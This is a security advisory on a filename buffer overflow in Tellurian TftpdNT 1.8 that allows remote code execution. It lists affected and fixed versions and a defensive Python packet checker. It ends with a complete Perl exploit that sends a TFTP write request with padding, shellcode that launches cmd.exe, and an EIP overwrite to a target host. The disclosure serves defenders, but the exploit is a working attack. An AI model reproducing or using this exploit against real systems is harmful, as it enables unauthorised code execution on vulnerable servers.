Security Vulnerability in Tellurian TftpdNT (Long Filename)

Summary

Tellurian TftpdNT is a TFTP server for Windows NT and Windows 9x.
A buffer overflow vulnerability in the product allows remote attackers to overflow an internal buffer and execute arbitrary code.

Credit:

SecurITeam would like to thank STORM for finding this vulnerability.


Details

Vulnerable systems:
 * TftpdNT version 1.8

Immune systems:
 * TftpdNT version 2.0

It is possible to cause a buffer overflow in the Tellurian TftpdNT product that overwrites the EIP pointer, which allows remote command execution.
The overflow occurs in the product’s parsing of the filename.
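
A defender-side check for the condition described above, added here as an example and not part of the original advisory or the vendor's code: it parses a TFTP read/write request and flags oversized or non-printable filenames before they reach a server. The function name inspect_tftp_request, the 128-byte limit and the sample datagrams are assumptions made for illustration.

```python
import struct

# Assumed local policy value (not from the advisory): reject filenames
# longer than this many bytes.
MAX_FILENAME = 128
OPCODES = {1: "RRQ", 2: "WRQ"}
MODES = {b"netascii", b"octet", b"mail"}

def inspect_tftp_request(datagram: bytes) -> list[str]:
    """Return findings for one UDP/69 payload (empty list means clean)."""
    if len(datagram) < 4:
        return ["truncated packet"]
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in OPCODES:
        return []  # DATA/ACK/ERROR carry no filename; out of scope here
    kind = OPCODES[opcode]
    findings = []
    # RRQ/WRQ layout: opcode | filename | 0x00 | mode | 0x00
    filename, sep, rest = datagram[2:].partition(b"\x00")
    if not sep:
        return [f"{kind}: filename not NUL-terminated"]
    if len(filename) > MAX_FILENAME:
        findings.append(
            f"{kind}: filename is {len(filename)} bytes (limit {MAX_FILENAME})")
    if any(b < 0x20 or b > 0x7E for b in filename):
        findings.append(f"{kind}: non-printable bytes in filename")
    mode, sep, _ = rest.partition(b"\x00")
    if not sep or mode.lower() not in MODES:
        findings.append(f"{kind}: missing or unknown transfer mode")
    return findings

# Constructed sample datagrams (filler bytes only, no payload).
BENIGN = b"\x00\x01" + b"boot/pxelinux.0" + b"\x00octet\x00"
OVERSIZED = b"\x00\x02" + b"A" * 508 + b"\x00netascii\x00"
BINARY_NAME = b"\x00\x02" + b"cfg\x90\x90.bin" + b"\x00octet\x00"

if __name__ == "__main__":
    samples = [("benign", BENIGN), ("oversized", OVERSIZED),
               ("binary", BINARY_NAME)]
    for name, pkt in samples:
        print(name, inspect_tftp_request(pkt) or "ok")
```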

Vendor status:
The vendor was informed and fixed the issue within 24 hours. A new version is available on the web site.

Exploit:
#!/usr/bin/perl -w
# Tellurian TFTP Server buffer overflow vulnerability

use IO::Socket;
$host = '192.168.1.44';
$port = '69';

$shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33" .
    "\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45" .
    "\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6" .
    "\x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F";

$buf = "\x00\x02";                            # TFTP opcode 2 (write request)
$buf .= "\x41" x (508 - length($shellcode));  # filename padding
$buf .= $shellcode;
$buf .= "\x0F\x02\xC7"; # EIP
$buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00";  # NUL, mode "netascii", NUL

print 'Length: ', length($buf), "\n";

$socket = IO::Socket::INET->new(Proto => 'udp') or die "Socket error: $@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";
print "Done\n";
